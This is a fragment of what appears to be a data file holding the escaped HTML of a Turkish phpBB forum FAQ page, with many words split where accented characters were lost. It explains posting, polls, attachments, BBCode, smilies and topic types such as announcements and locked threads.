            "neticisinin karar\u0131d\u0131r, bu durumun sebebini y",
            "neticilere sorabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r5\"></a><b>&#187; Seviye nedir ve nas\u0131l de\u011fi\u015ftirebilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Seviye, kullan\u0131c\u0131 ad\u0131n\u0131z\u0131n alt\u0131nda g",
            "r ve g",
            "nderdi\u011finiz ileti say\u0131s\u0131n\u0131 g",
            "sterir ya da yetkili ve y",
            "netici gibi belli kullan\u0131c\u0131lar\u0131 belli eder. Genel olarak seviyenizi do\u011frudan de\u011fi\u015ftiremezsiniz ",
            "; bu seviyelerin y",
            "netimi pano y",
            "neticisine aittir. L",
            "tfen, sadece ileti say\u0131n\u0131z\u0131 artt\u0131rmak i",
            "in panoyu amac\u0131 d\u0131\u015f\u0131nda kullanmay\u0131n, muhtemelen yetkili ya da y",
            "neticiler taraf\u0131ndan bu iletiler bulunacak ve iletileriniz silinerek basit bir \u015fekilde seviyeniz d",
            "lecektir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r6\"></a><b>&#187; ",
            "yeye e-posta g",
            "nder butonuna bas\u0131nca neden oturum a",
            "mam isteniyor?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Sadece kay\u0131tl\u0131 kullan\u0131c\u0131lar (mesaj panosu y",
            "neticisinin izin vermesi durumunda) e-posta g",
            "nderebilir. Bunun amac\u0131 e-posta hizmetinin kay\u0131t olmayan kullan\u0131clar\u0131n olumsuz kullan\u0131mlar\u0131n\u0131 engellemektir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>G",
            "nderim Konular\u0131</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r0\"></a><b>&#187; Bir forumda nas\u0131l ba\u015fl\u0131k a",
            "abilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Forumlar\u0131n birinde yeni konu a",
            "mak i",
            "in forumun ",
            "ndeki ya da ileti sayfas\u0131ndaki ilgili butonu t\u0131klay\u0131n. Bir ileti g",
            "ndermeden ",
            "nce kay\u0131t olman\u0131z gerekebilir, sizin i",
            "in kullan\u0131labilir olan ",
            "zellikler panonun alt k\u0131sm\u0131nda ve ba\u015fl\u0131k ekran\u0131nda listelenmi\u015ftir. ",
            "rne\u011fin: Yeni ba\u015fl\u0131k a",
            "abilirsiniz, Anketlerde oy kullanabilirsiniz, gibi</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r1\"></a><b>&#187; Bir iletiyi nas\u0131l de\u011fi\u015ftirebilir veya silerim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer y",
            "netici ya da yetkili de\u011filseniz sadece kendi iletinizde de\u011fi\u015fiklik ya da silme i\u015flemi yapabilirsiniz. Bir iletiyi o ileti ile ilgili d",
            "zenleme butonunu t\u0131klayarak de\u011fi\u015ftirebilirsiniz, bazen bu i\u015flem i",
            "in bir zaman k\u0131s\u0131tlamas\u0131 konulabilir.E\u011fer siz ileti yazd\u0131ktan sonra ba\u015fka biri ileti g",
            "ndermi\u015fse de\u011fi\u015ftirme ekran\u0131ndan ileti g",
            "sterim ekran\u0131na d",
            "z zaman iletinizin alt\u0131nda k\u0131sa bir metin g",
            "sterilecektir, bu metinde iletiyi ne zaman ve ka",
            " defa de\u011fi\u015ftirdi\u011finiz listelenecektir. Bu metin e\u011fer ba\u015fka biri ileti g",
            "ndermemi\u015fse g",
            "sterilmeyecektir, yetkili ya da y",
            "neticiler taraf\u0131ndan yap\u0131lan de\u011fi\u015fiklikler de g",
            "sterilmeyecektir. Bu durumda size d",
            "zenleme ile ilgili bir not yazmalar\u0131 yetkili ya da y",
            "neticilerin kendi tercihine kalm\u0131\u015ft\u0131r. Unutmay\u0131n ki, normal kullan\u0131c\u0131lar kendi iletilerinden sonra ba\u015fka birinin ileti g",
            "ndermesi durumunda iletilerini silemezler.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r2\"></a><b>&#187; \u0130letime imzam\u0131 nas\u0131l eklerim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u0130letinize imza eklemek i",
            "ncelikle Kullan\u0131c\u0131 Paneliniz arac\u0131l\u0131\u011f\u0131 ile bir imza olu\u015fturmal\u0131s\u0131n\u0131z. Ayn\u0131 zamanda uygun kontrol kutusunu i\u015faretlemek suretiyle varsay\u0131lan imza olarak b",
            "n iletilerinize ekleyebilirsiniz (iste\u011finiz dahilinde, imzan\u0131z\u0131n g",
            "nmesini istemedi\u011finiz iletilerde \"imzam\u0131 g",
            "ster\" kontrol kutusunu bo\u015f hale getirerek imzan\u0131z\u0131n sadece o ileti i",
            "in g",
            "sterilmemesini sa\u011flayabilirsiniz).</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r3\"></a><b>&#187; Nas\u0131l anket olu\u015ftururum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Yeni bir konu a",
            "arken (ya da e\u011fer yetkiniz varsa bir ba\u015fl\u0131\u011f\u0131n ilk iletisini de\u011fi\u015ftirirken) ana g",
            "nderim formunun alt\u0131nda \"Anket Olu\u015fturma\" sekmesini g",
            "z (e\u011fer g",
            "yorsan\u0131z bu anket olu\u015fturmak i",
            "in gerekli olan yetkilere sahip oldu\u011funuzu g",
            "sterir). Anket olu\u015ftururken, \"Anket sorusu\" olarak bir ba\u015fl\u0131k girmelisiniz ve \"Anket se",
            "ene\u011fi\" formuna en az bir adet se",
            "enek girmelisiniz. Her se",
            "ene\u011fin farkl\u0131 bir metin alan\u0131na yaz\u0131ld\u0131\u011f\u0131ndan emin olun. Ayn\u0131 zamanda kullan\u0131c\u0131lar\u0131n oylama esnas\u0131nda se",
            "ecekleri se",
            "enek say\u0131s\u0131n\u0131 da \u201cKullan\u0131c\u0131 ba\u015f\u0131na d",
            "\u015fen se",
            "enekler\u201d alt\u0131nda ayarlayabilir ve anket i",
            "in bir s",
            "re belirleyebilirsiniz (0 ile i\u015faretlediyseniz anket s",
            "resiz olarak uygulan\u0131r) ve son se",
            "enek olarak e\u011fer izin verilmi\u015fse ",
            "yeler oylar\u0131n\u0131 de\u011fi\u015ftirebilirler.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r4\"></a><b>&#187; Neden daha fazla anket se",
            "ene\u011fi olu\u015fturam\u0131yorum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Anket se",
            "enek say\u0131s\u0131 pano y",
            "netici taraf\u0131ndan belirlenir. E\u011fer izin verilen say\u0131dan daha fazla anket se",
            "ene\u011fi eklemeye ihtiyac\u0131n\u0131z varsa, pano y",
            "neticisiyle irtibata ge",
            "ebilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r5\"></a><b>&#187; Bir anketi nas\u0131l d",
            "zenleyebilir ya da silebilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u0130letilerle beraber, anketler de iletiyi g",
            "nderen ",
            "ye, yetkili ya da y",
            "netici taraf\u0131ndan de\u011fi\u015ftirilebilir. Anketleri de\u011fi\u015ftirmek i",
            "in ba\u015fl\u0131ktaki ilk iletiyi de\u011fi\u015ftirin (genelde bu ileti anketle ilgilidir). E\u011fer hi",
            " kimse oy kullanmam\u0131\u015fsa ",
            "yeler anketi silebilir ya da de\u011fi\u015ftirebilir. Ancak, e\u011fer oy kullan\u0131lm\u0131\u015fsa sadece yetkili ve y",
            "neticiler silebilir. Bu uygulaman\u0131n amac\u0131, oylama s\u0131ras\u0131nda farkl\u0131 kimselerin se",
            "enekleri de\u011fi\u015ftirerek oylaman\u0131n y",
            " de\u011fi\u015ftirmesini engellemktir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r6\"></a><b>&#187; Baz\u0131 forumlara neden eri\u015femiyorum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Baz\u0131 forumlar belli kullan\u0131c\u0131 ya da gruplar\u0131n kullan\u0131m\u0131yla s\u0131n\u0131rland\u0131r\u0131labilir. G",
            "rmek, okumak, ileti g",
            "ndermek vb. i",
            "in yetilendirilmeniz gerekebilir. Sadece yetkililer ve y",
            "neticiler bu yetkilendirmeyi yapabilir, bu durumda ilgililerden biriyle ileti\u015fime ge",
            "meniz gerekmektedir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r7\"></a><b>&#187; Neden eklenti y",
            "kleyemiyorum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Forum, grup ya da kullan\u0131c\u0131 izinlerine ba\u011fl\u0131 olarak eklenti ekleyebilirsiniz. Pano y",
            "neticisi baz\u0131 forumlara eklenti y",
            "klemenize izin vermi\u015f olabilir ya da sadece belli gruplar eklenti y",
            "kleyebiliyor olabilir. E\u011fer neden eklenti y",
            "kleyemedi\u011finizden emin de\u011filseniz mesaj panosu y",
            "neticisiyle irtibata ge",
            "ebilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r8\"></a><b>&#187; Neden bir uyar\u0131 ald\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Her pano y",
            "neticisi siteleri i",
            "in kendi kurallar\u0131n\u0131 uygulama hakk\u0131na sahiptir. E\u011fer kurallardan birini ihlal ettiyseniz, bu y",
            "zden uyar\u0131 alm\u0131\u015f olabilirsiniz. Unutmay\u0131n ki; bu site y",
            "neticisinin karar\u0131d\u0131r ve phpBB Grubunun bu konuda yapabilece\u011fi bir \u015fey yoktur. L",
            "tfen emin olmak i",
            "in mesaj panosu y",
            "neticisiyle irtibata ge",
            "in.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r9\"></a><b>&#187; \u0130letileri yetkililere nas\u0131l rapor ederim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer pano y",
            "neticisi izin vermi\u015fse, rapor etmek istedi\u011finiz iletiye gidin ve iletiyi rapor etmeyle ilgili olan butonu t\u0131klay\u0131n. Rapor etmek i",
            "in gerekli olan i\u015flemleri yap\u0131n.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r10\"></a><b>&#187; Konu g",
            "nderimindeki \u201cKaydet\u201d butonu ne i",
            "in?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bu size daha sonraki zamanlarda iletinizi tamamlamak ya da onaylamak i",
            "in iletinizi saklama \u015fans\u0131 tan\u0131r. Bu iletileri tekrar y",
            "klemek i",
            "in Kullan\u0131c\u0131 Paneline gidin ve gerekli i\u015flemleri tamamlay\u0131n.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r11\"></a><b>&#187; Neden iletimin onaylanmas\u0131 gerekiyor?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Pano y",
            "neticisi iletilerinizin ",
            "ncelikle kontrol edilmesi gerekti\u011fine karar verebilir. Y",
            "netici sizi mesajlar\u0131 onaylanmadan ",
            "nce g",
            "zden ge",
            "irilmesi gereken ",
            "yelerden olu\u015fan bir gruba dahil etmi\u015f olabilir. Bu durumda ayr\u0131nt\u0131l\u0131 bilgi almak i",
            "in y",
            "neticiyle irtibata ge",
            "melisiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r12\"></a><b>&#187; Konumu nas\u0131l g",
            "ncel tutabilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">G",
            "rmekte oldu\u011funuz ileti sayfas\u0131ndaki \"Konuyu g",
            "ncel tut\" ba\u011flant\u0131s\u0131n\u0131 kullanarak ilgili konunuzu forum i",
            "inde en ",
            "ste getirebilirsiniz. E\u011fer bunu g",
            "yorsan\u0131z bu ",
            "zellik iptal edilmi\u015ftir. Ayn\u0131 zamanda, muhtemelen iletiye cevap yazarak da konunuzu forum i",
            "inde en ",
            "ste getirebilirsiniz. Yine de, ziyaret etti\u011finiz mesaj panosununun kurallar\u0131na bir g",
            "z atabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Bi",
            "imlendirme ve Ba\u015fl\u0131k Tipleri</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r0\"></a><b>&#187; Bi",
            "im kodu nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bi",
            "im kodu (BBCode) ",
            "zel bir HTML uygulamas\u0131d\u0131r, y",
            "netici taraf\u0131ndan belirlenen bi",
            "im kodu se",
            "eneklerini kullanabilirsiiz (ayn\u0131 zamanda iletilerinize g",
            "re bu se",
            "ene\u011fi iptal edebilirsiniz). Bi",
            "im kodlar\u0131 HTML stillerine benzer, kodlar &lt; ve &gt; yerine k",
            "\u015feli parantez i",
            "ine yaz\u0131l\u0131r [ve] ve bazen uygulanmayabilir. Daha ayr\u0131nt\u0131l\u0131 bilgi i",
            "in ileti penceresindeki bi",
            "im kodlar\u0131 rehberine bakabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r1\"></a><b>&#187; HTML kullanabilir miyim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Hay\u0131r, bu panoda HTML kullanarak ileti g",
            "ndermeniz m",
            "n de\u011fildir. HTML ile ger",
            "ekle\u015ftirebilece\u011finiz de\u011fi\u015fikliklerin bir ",
            "o\u011fu bi",
            "im kodlar\u0131 kullan\u0131larak yap\u0131labilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r2\"></a><b>&#187; \u0130fadeler nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u0130fadeler k",
            "k resimlerdir ve k\u0131sa kodlar kullanarak baz\u0131 hislerinizi resmetmenizi sa\u011flar, ",
            "rne\u011fin; :) mutlu oldu\u011funuz, :( ",
            "n oldu\u011funuz anlam\u0131na gelir. \u0130fadeleri tam listesi ileti formunda g",
            "sterilmektedir. A\u015f\u0131r\u0131 ifade kullan\u0131m\u0131ndan ka",
            "\u0131nmal\u0131s\u0131n\u0131z, bu okunabilirli\u011fi azalt\u0131r ve bu iletiler yetkilerce d",
            "zenlenebilir ya da silinebilir. Pano y",
            "neticisi iletilerde kullan\u0131labilecek ifade say\u0131s\u0131nda k\u0131s\u0131tlamaya gidebilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r3\"></a><b>&#187; Resim g",
            "nderebilir miyim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Evet, iletilerinizde resim g",
            "sterebilirsiniz. E\u011fer y",
            "netici eklenti y",
            "klemenize izin veriyorsa, panoya da resim y",
            "kleyebilirisniz. Aksi takdirde, \u015fifrelenmemi\u015f bir alana y",
            "kleyece\u011finiz resme http://www.example.com/my-picture.gif gibi bir ba\u011flant\u0131 vermeniz gerekir. Bilgisayar\u0131n\u0131zdaki bir resmin linkini (bilgisayar\u0131n\u0131z kamuya a",
            "\u0131k bir sunucu de\u011filse) ve hotmail, yahoo gibi bir \u015fifrelenmi\u015f alanda y",
            " ise link veremezsiniz. Resimlerinizi g",
            "stermek i",
            "in [img] bi",
            "im kodunu kullanabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r4\"></a><b>&#187; Genel duyuru nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Genel duyurular ",
            "nemli bilgileri bar\u0131nd\u0131r\u0131r ve m",
            "n oldu\u011fu kadar ",
            "abuk okuman\u0131z gerekir. Genel duyurular her forumun en ",
            "st k\u0131sm\u0131nda ve Kullan\u0131c\u0131 Kontrol Panelinde g",
            "lenir. Genel duyuru g",
            "nderip g",
            "nderememeniz gerekli olan izinlerin verilmi\u015f olmas\u0131na ba\u011fl\u0131d\u0131r, bu izinler y",
            "netici taraf\u0131ndan ayarlan\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r5\"></a><b>&#187; Duyuru nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Duyurular okumakta oldu\u011funuz forum ile ilgili ",
            "nemli bilgileri i",
            "erir ve m",
            "n oldu\u011fu kadar k\u0131sa zamanda okunmal\u0131d\u0131r. Duyurular forumda g",
            "nderilen iletilerin ",
            "st k\u0131sm\u0131nda g",
            "sterilir. Genel duyurularda oldu\u011fu gibi, duyuru g",
            "nderip g",
            "nderememeniz gerekli olan izinlerin verilmi\u015f olmas\u0131na ba\u011fl\u0131d\u0131r, bu izinler y",
            "netici taraf\u0131ndan ayarlan\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r6\"></a><b>&#187; Sabit konu nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Sabit ba\u015fl\u0131klar forumlarda duyurular\u0131n alt\u0131nda ve sadece ilk sayfada g",
            "sterilir. Genel olarak okuman\u0131z gereken ",
            "nemli bilgileri bar\u0131nd\u0131r\u0131r. Genel duyurularda ve duyurularda oldu\u011fu gibi, sabit ba\u015fl\u0131k g",
            "nderip g",
            "nderememeniz gerekli olan izinlerin verilmi\u015f olmas\u0131na ba\u011fl\u0131d\u0131r, bu izinler y",
            "netici taraf\u0131ndan ayarlan\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r7\"></a><b>&#187; Kilitli konu nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kilitli konular, kullan\u0131c\u0131lar\u0131n art\u0131k ileti g",
            "nderemeyece\u011fi ya da anketlerinde oy verme s",
            "resi dolan ba\u015fl\u0131klard\u0131r. Ba\u015fl\u0131klar pano yetkili ya da y",
            "neticilerinin ayarlamalar\u0131yla bir ",
            "ok sebepten dolay\u0131 kilitlenmi\u015f olabilir. Ayn\u0131 zamanda e\u011fer ilgili izinler y",
            "netici taraf\u0131ndan verilmi\u015fse siz de kendi a",
            "t\u0131\u011f\u0131n\u0131z ba\u015fl\u0131klar\u0131 kilitleyebilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r8\"></a><b>&#187; Konu ikonu nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Konu ikonlar\u0131 iletilerin i",
            "eri\u011fiyle ilgili resimlerdir. Ba\u015fl\u0131k ikonu kullan\u0131p kullanamaman\u0131z y",
            "neticilerin verece\u011fi izinlere ba\u011flad\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
